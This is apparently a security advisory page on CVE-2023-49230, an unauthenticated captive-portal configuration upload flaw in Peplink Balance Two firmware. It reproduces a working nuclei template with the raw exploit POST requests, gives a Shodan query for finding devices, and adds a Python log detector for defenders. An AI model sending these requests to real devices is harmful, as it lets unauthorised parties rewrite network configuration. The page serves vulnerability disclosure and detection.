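Peplink Balance Two Unauthenticated Configuration Upload Vulnerability

Vulnerability Information

Vulnerability name: Peplink Balance Two Unauthenticated Configuration Upload Vulnerability

Vulnerability ID:

  • CVE: CVE-2023-49230

Vulnerability type: Unauthorized access

Severity: High

Description: Peplink Balance Two is an enterprise-grade load-balancing and failover device, widely deployed in enterprise environments that need high availability and network redundancy. It optimizes the use of multiple internet connections to keep business operations continuous and the network stable. The vulnerability affects firmware versions earlier than 8.4.0.

The issue is one of unauthorized access. Because a proper authorization check is missing, an attacker can upload files through the /guest/portal_admin_upload.cgi path without authenticating and modify the device's captive portal configuration. The technical root cause is improper handling of user input: the device does not verify the legitimacy of the upload request, which lets an attacker bypass the normal authentication flow.

The security risk is high. An attacker can use this vulnerability to modify the device's configuration remotely, which may lead to service disruption, data leakage, or other malicious actions. Because exploitation requires no authentication and can be triggered remotely over the network, the barrier to attack is low and attacks are easy to automate. Enterprise users should upgrade immediately to firmware 8.4.0 or later to avoid potential security threats.

Vendor: peplink

Product: balance_two_firmware

Affected versions: version < 8.4.0

Search query: html:"PEPLINK"

Source: https://github.com/projectdiscovery/nuclei-templates/blob/6ed1f2bdb29fe3b8b30d4d99a5bd65a20a80d315/http%2Fcves%2F2023%2FCVE-2023-49230.yaml

Type: projectdiscovery/nuclei-templates:github issues

POC Details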


id: CVE-2023-49230

info:
  name: Peplink Balance Two before 8.4.0 - Unauthenticated Config Upload
  author: srilakivarma
  severity: high
  description: |
    A vulnerability in Peplink Balance Two prior to version 8.4.0 allows unauthenticated attackers to modify captive portal configurations due to a missing authorization check. Specifically, attackers can upload files via /guest/portal_admin_upload.cgi, with the changes reflected at /guest/preview.cgi?portal_id=1.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2023-49230
    - https://www.synacktiv.com/publications%253Ffield_tags_target_id%253D4
    - https://www.synacktiv.com/sites/default/files/2023-12/synacktiv-peplink-multiple-vulnerabilities.pdf
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
    cvss-score: 8.8
    cve-id: CVE-2023-49230
    cwe-id: CWE-862
    epss-score: 0.00091
    epss-percentile: 0.27
    cpe: cpe:2.3:o:peplink:balance_two_firmware:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 3
    vendor: peplink
    product: balance_two_firmware
    shodan-query: html:"PEPLINK"
  tags: cve,cve2023,peplink,unauth,intrusive,file-upload

flow: http(1) && http(2) && http(3)

http:
  - method: GET
    path:
      - "{{BaseURL}}/cgi-bin/MANGA/index.cgi"

    matchers:
      - type: word
        part: body
        words:
          - 'init_company_name = "Peplink"'
        internal: true

  - raw:
      - |
        POST /guest/portal_admin_upload.cgi HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=---------------------------370611892836891531633729116268

        -----------------------------370611892836891531633729116268
        Content-Disposition: form-data; name="option"

        edit_page
        -----------------------------370611892836891531633729116268
        Content-Disposition: form-data; name="mode"

        submit
        -----------------------------370611892836891531633729116268
        Content-Disposition: form-data; name="portal_id"

        1
        -----------------------------370611892836891531633729116268
        Content-Disposition: form-data; name="data"

        {"status":"ok","config":{"login":{"access_mode":"open","message":"","tnc_content":"Terms and Conditions.","tnc_title":"Terms and Conditions","tnc_link":"terms","tnc_prompt":"I agree to #TNC_LINK#","back_login_button":"Back to Login","agree_button":"{{randstr}}","session_id1":" ","session_id2":" "},"common":{"hide_quota":"no","landing_url":"","logo_url":"logo.cgi?portal_id=1&type=preview","logo_url_def":"logo.cgi?default=1","uploaded_logo_size":0,"footer":"Powered by Peplink.","footer_default":"Powered by Peplink."},"success":{},"reach_quota":{},"quota":{"limit":{"data":0,"session_timeout":1800}}}}
        -----------------------------370611892836891531633729116268
        Content-Disposition: form-data; name="logo_action"

        x
        -----------------------------370611892836891531633729116268
        Content-Disposition: form-data; name="logo"; filename=""
        Content-Type: application/octet-stream

        -----------------------------370611892836891531633729116268--

    matchers:
      - type: word
        part: body
        words:
          - '"status": "save_success"'
        internal: true

  - raw:
      - |
        POST /guest/api.cgi HTTP/1.1
        Host: {{Hostname}}

        mode=info&option=preview&portal_id=1

    matchers:
      - type: dsl
        dsl:
          - "contains(body, '{{randstr}}')"
          - 'status_code_2 == 200'
        condition: and
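
For defenders, the request sequence in the template doubles as a log signature. The following Python detector is an added example, not part of the original page or the nuclei template: it flags POSTs to the upload CGI and notes whether the same client then read the portal configuration back. It assumes combined-format access logs from a reverse proxy in front of the device; the 60-second window, the `trusted` parameter and the sample lines are constructed for illustration.

```python
import re
from datetime import datetime, timedelta

# Paths from the template: the write step and the read-back step.
UPLOAD = "/guest/portal_admin_upload.cgi"
READBACK = "/guest/api.cgi"
WINDOW = timedelta(seconds=60)  # assumption: probe steps arrive close together

# Assumption: combined-log-format lines from a proxy in front of the device.
LINE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

def parse(line):
    m = LINE.match(line)
    if not m:
        return None
    e = m.groupdict()
    e["ts"] = datetime.strptime(e["ts"], "%d/%b/%Y:%H:%M:%S %z")
    e["path"] = e["path"].split("?", 1)[0]  # ignore any query string
    return e

def find_portal_uploads(lines, trusted=frozenset()):
    """One finding per POST to the upload CGI from a non-trusted source.
    'read_back': same client POSTs to the read-back CGI within WINDOW."""
    events = sorted(filter(None, map(parse, lines)), key=lambda e: e["ts"])
    findings = []
    for i, e in enumerate(events):
        if e["method"] != "POST" or e["path"] != UPLOAD or e["ip"] in trusted:
            continue
        read_back = any(
            n["ip"] == e["ip"] and n["method"] == "POST"
            and n["path"] == READBACK and n["ts"] - e["ts"] <= WINDOW
            for n in events[i + 1:]
        )
        # HTTP 200 alone does not prove the save succeeded; the log has no body.
        findings.append({"ip": e["ip"], "time": e["ts"].isoformat(),
                         "http_200": e["status"] == "200", "read_back": read_back})
    return findings

# Constructed sample log lines (documentation addresses, not real traffic).
SAMPLE = [
    '198.51.100.7 - - [09/Jul/2025:10:00:01 +0000] "GET /cgi-bin/MANGA/index.cgi HTTP/1.1" 200 5120',
    '198.51.100.7 - - [09/Jul/2025:10:00:02 +0000] "POST /guest/portal_admin_upload.cgi HTTP/1.1" 200 64',
    '198.51.100.7 - - [09/Jul/2025:10:00:03 +0000] "POST /guest/api.cgi HTTP/1.1" 200 900',
    '192.0.2.10 - - [09/Jul/2025:10:02:00 +0000] "POST /guest/api.cgi HTTP/1.1" 200 900',
    '203.0.113.20 - - [09/Jul/2025:10:05:00 +0000] "POST /guest/portal_admin_upload.cgi HTTP/1.1" 403 0',
]
```

A finding with both `http_200` and `read_back` set deserves a comparison of the current captive portal configuration against a known-good copy, since the access log alone cannot show what was written.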



http://example.com/2025/07/09/github_3330909523/
Author: lianccc
Published: July 9, 2025